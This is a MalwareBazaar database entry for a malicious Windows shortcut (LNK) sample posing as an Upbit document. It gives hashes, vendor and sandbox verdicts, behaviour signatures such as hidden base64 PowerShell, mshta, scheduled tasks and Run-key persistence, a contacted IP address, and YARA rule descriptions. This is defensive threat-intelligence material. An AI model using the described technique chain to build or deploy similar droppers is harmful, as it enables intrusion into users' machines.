MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 10


Intelligence 10 IOCs YARA 6 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
SHA3-384 hash: 84f17c307b1542fe7466ad9cb4ceb019c270cee2e530a8334b42aa7e5a0119c7d033d821d436709ca104a0c7ede9eff7
SHA1 hash: 50e4d8a112e4aad2c984d22f83c80c8723f232da
MD5 hash: 37fb639a295daa760c739bc21c553406
humanhash: thirteen-failed-mirror-sodium
File name:Upbit_20240916 docx lnk
Download: download sample
File size:2'362 bytes
First seen:2024-09-16 16:33:42 UTC
Last seen:2024-09-23 11:19:10 UTC
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 48:8tWWIAyxiZV3ShPDg3wCOCAyDRa1WvRyXv3gWQAvO5z:8tWCyGtwAbWSRMvguW
TLSH T13C41EB012BD21725D2720B3690BFD241492DBE15AB63CF5D40A8ADCD0BA0A08E877F79
Magika lnk
Reporter JAMESWT_WT
Tags:64-49-14-181 lnk

Intelligence

File Origin
# of uploads :
2
# of downloads :
105
Origin country :
IT IT
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.LNK.PowerShell.Exec-5.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.26418.PshHeur.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
96.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=66e85dfc71e91b3281ba11a4
Tags:
Encryption Execution Exploit Generic Network Stealth Minerva
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
lolbin masquerade mshta powershell
Link:
https://www.filescan.io/uploads/66e85e000883d6a903eb9262/reports/4bbe4e28-8877-4eeb-9eec-1cb026dd9f6a/overview
Verdict:
Malicious
Labled as:
BZC.YAX.Pantera.41
Link:
https://www.hybrid-analysis.com/sample/41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
Result
Verdict:
MALICIOUS
Details
Hidden Powershell
Detected a pivot to Powershell that utilizes commonly nefarious attributes such as '-windowstyle hidden'.
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1512054
Signature
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Found suspicious ZIP file
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Register Wscript In Run Key
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1512054 Sample: Upbit_20240916 docx lnk.lnk Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 84 Sigma detected: Register Wscript In Run Key 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 Windows shortcut file (LNK) starts blacklisted processes 2->88 90 13 other signatures 2->90 9 mshta.exe 1 2->9         started        12 wscript.exe 1 2->12         started        14 wscript.exe 2->14         started        16 4 other processes 2->16 process3 dnsIp4 106 Windows shortcut file (LNK) starts blacklisted processes 9->106 108 Suspicious powershell command line found 9->108 110 Encrypted powershell cmdline option found 9->110 112 Bypasses PowerShell execution policy 9->112 19 powershell.exe 32 9->19         started        114 Wscript starts Powershell (via cmd or directly) 12->114 23 powershell.exe 12->23         started        25 powershell.exe 12->25         started        27 powershell.exe 14->27         started        29 powershell.exe 14->29         started        76 127.0.0.1 unknown unknown 16->76 31 powershell.exe 16->31         started        33 powershell.exe 16->33         started        35 powershell.exe 16->35         started        signatures5 process6 dnsIp7 78 64.49.14.181, 49715, 49719, 49729 DIXIE-NETUS United States 19->78 92 Found suspicious powershell code related to unpacking or dynamic code loading 19->92 94 Loading BitLocker PowerShell Module 19->94 37 wscript.exe 8 2 19->37         started        40 conhost.exe 19->40         started        96 Windows shortcut file (LNK) starts blacklisted processes 23->96 50 2 other processes 23->50 42 conhost.exe 25->42         started        52 2 other processes 27->52 44 conhost.exe 29->44         started        54 2 other processes 31->54 46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        signatures8 process9 signatures10 98 Windows shortcut file (LNK) starts blacklisted processes 37->98 100 Wscript starts Powershell (via cmd or directly) 37->100 102 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->102 104 Suspicious execution chain found 37->104 56 cmd.exe 37->56         started        58 cmd.exe 1 37->58         started        61 powershell.exe 37->61         started        63 WINWORD.EXE 138 461 37->63         started        process11 signatures12 65 reg.exe 56->65         started        68 conhost.exe 56->68         started        116 Uses schtasks.exe or at.exe to add and modify task schedules 58->116 70 conhost.exe 58->70         started        72 schtasks.exe 1 58->72         started        74 conhost.exe 61->74         started        process13 signatures14 80 Creates autostart registry keys with suspicious values (likely registry only malware) 65->80 82 Creates an autostart registry key pointing to binary in C:\Windows 65->82
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229/
Threat name:
Win32.Trojan.Pantera
Create hunting rule
Status:
Malicious
First seen:
2024-09-16 16:30:51 UTC
File Type:
Binary
AV detection:
6 of 38 (15.79%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ihhwfgfedqttk7xf64gyzuoaxvegtd6dbrbfl6wwvelzqkdokiuq._file
Result
Malware family:
n/a
Score:
  8/10
Tags:
execution persistence
Link:
https://tria.ge/reports/240916-t23wfsxgnd/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Drops file in System32 directory
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Blocklisted process makes network request
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Archive_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies archive (compressed) files in shortcut (LNK) files.
Rule name:EXE_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:MSOffice_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies Microsoft Office artefacts in shortcut (LNK) files.
Rule name:PS_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name:Script_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies scripting artefacts in shortcut (LNK) files.
Rule name:SUSP_LNK_SuspiciousCommands
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Detects LNK file with suspicious content

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments